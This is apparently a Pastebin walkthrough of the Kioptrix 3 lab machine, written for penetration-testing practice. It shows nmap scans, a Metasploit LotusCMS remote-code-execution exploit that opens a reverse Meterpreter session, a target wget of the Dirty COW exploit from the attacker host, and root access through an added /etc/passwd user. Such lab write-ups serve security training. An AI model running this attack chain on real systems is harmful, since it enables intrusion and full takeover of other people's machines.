Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Enumeration:
- Starting off with a basic nmap scan, and then going onto enumerating versions because there are only two services running. SSH and HTTP.
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:53 EST
- Nmap scan report for kioptrix3.com (192.168.1.27)
- Host is up (0.00024s latency).
- Not shown: 998 closed ports
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open http
- MAC Address: 00:0C:29:B8:ED:D5 (VMware)
- Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
- root@spooky:~# nmap -sT -p 22,80 -A 192.168.1.27
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:53 EST
- Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
- NSE Timing: About 0.00% done
- Nmap scan report for kioptrix3.com (192.168.1.27)
- Host is up (0.00030s latency).
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
- | ssh-hostkey:
- | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
- |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
- 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
- | http-cookie-flags:
- | /:
- | PHPSESSID:
- |_ httponly flag not set
- |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
- |_http-title: Ligoat Security - Got Goat? Security ...
- MAC Address: 00:0C:29:B8:ED:D5 (VMware)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running: Linux 2.6.X
- OS CPE: cpe:/o:linux:linux_kernel:2.6
- OS details: Linux 2.6.9 - 2.6.33
- Network Distance: 1 hop
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- TRACEROUTE
- HOP RTT ADDRESS
- 1 0.30 ms kioptrix3.com (192.168.1.27)
- User:
- After searching for a little while and struggling to gain a foothold, I went back to the beginning and read the blog posts. After reading them I had noticed the "Login" page which I had glanced over. After a quick searchsploit lotuscms, I had found a RCE vulnerability for Metasploit. We can use "msf" to hop into metasploit, then use "search lotuscms" to get the path to the module. To use it we can do:
- msf5 > use exploit/multi/http/lcms_php_exec
- msf5 exploit(multi/http/lcms_php_exec) >
- Next we need to figure out what we need to supply metasploit with...
- msf5 exploit(multi/http/lcms_php_exec) > show options
- Module options (exploit/multi/http/lcms_php_exec):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
- RHOSTS yes The target address range or CIDR identifier
- RPORT 80 yes The target port (TCP)
- SSL false no Negotiate SSL/TLS for outgoing connections
- URI /lcms/ yes URI
- VHOST no HTTP server virtual host
- So it looks like we just need to specify RHOSTS and URI. To do so we can use:
- msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.1.27
- RHOSTS => 192.168.1.27
- msf5 exploit(multi/http/lcms_php_exec) > set URI /index.php?system=Admin
- URI => /index.php?system=Admin
- And to execute it we need to type exploit!
- msf5 exploit(multi/http/lcms_php_exec) > exploit
- [*] Started reverse TCP handler on 192.168.1.19:4444
- [*] Using found page param: /index.php?page=index
- [*] Sending exploit ...
- [*] Sending stage (38247 bytes) to 192.168.1.27
- [*] Meterpreter session 1 opened (192.168.1.19:4444 -> 192.168.1.27:48904) at 2019-01-26 18:39:57 -0500
- meterpreter >
- Awesome. We've got a shell, to drop into it we can easily type in "shell". While we're at it, we need to figure out who we're running as, what kernel, and what release for any pirv-esc exploits. But first, we should upgrade our shell with :
- python -c "import pty; pty.spawn('/bin/bash')"
- www-data@Kioptrix3:/home/www/kioptrix3.com$
- Perfect, now onto priv esc!
- Priv Esc:
- www-data@Kioptrix3:/home/www/kioptrix3.com
- $ uname -a
- Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
- www-data@Kioptrix3:/home/www/kioptrix3.com
- $ cat /etc/lsb-release
- DISTRIB_ID=Ubuntu
- DISTRIB_RELEASE=8.04
- DISTRIB_CODENAME=hardy
- DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
- www-data@Kioptrix3:/home/www/kioptrix3.com$
- So we're running on quite a dated Linux Kernel, which means it's likely that there's a privileged escalation exploit out.
- After some googling it looks like the kernel is vulnerable to Dirty Cow. Specifically "Pokemon Dirty Cow", CVE 2016-5195. Thanks to FireFart for providing the exploit for us to use. You can check out the exploit on Exploit-DB (https://www.exploit-db.com/exploits/40839). We can wget the raw version on our box
- root@spookysec
- #wget https://www.exploit-db.com/raw/40839 -O ./dirty.c
- Now we need to host the file for Kioptrix3 to download with a SimpleHTTPServer.
- root@spookysec
- #python -m SimpleHTTPServer 80
- Serving HTTP on 0.0.0.0 port 80...
- and back over on Kioptrix3, we can get the file with
- www-data@Kioptrix3:/tmp$ wget http://192.168.1.19/dirty.c
- and we can compile our exploit with
- www-data@Kioptrix3:/tmp
- $ gcc -pthread dirty.c -o dirty -lcrypt
- Make the file executable...
- www-data@Kioptrix3:/tmp
- $ chmod +x dirty
- And now execute with...
- www-data@Kioptrix3:/tmp
- $ ./dirty
- /etc/passwd successfully backed up to /tmp/passwd.bak
- Please enter the new password: root
- Complete line:
- firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
- After that the shell froze up, lets try SSHing in from our box with
- root@spookysec
- #ssh firefart@192.168.1.27
- Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
- The programs included with the Ubuntu system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
- applicable law.
- To access official Ubuntu documentation, please visit:
- http://help.ubuntu.com/
- firefart@Kioptrix3:~# id
- uid=0(firefart) gid=0(root) groups=0(root)
- And rooted. This one wasn't too bad. However, the difficulty is starting to kick up a little bit! I haven't done a PWK box like this yet, but that's good. PWK Duplicates are great, but variety is needed. We need to be aware of lots of scenarios so we know how to handle them in an effective manner :D
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement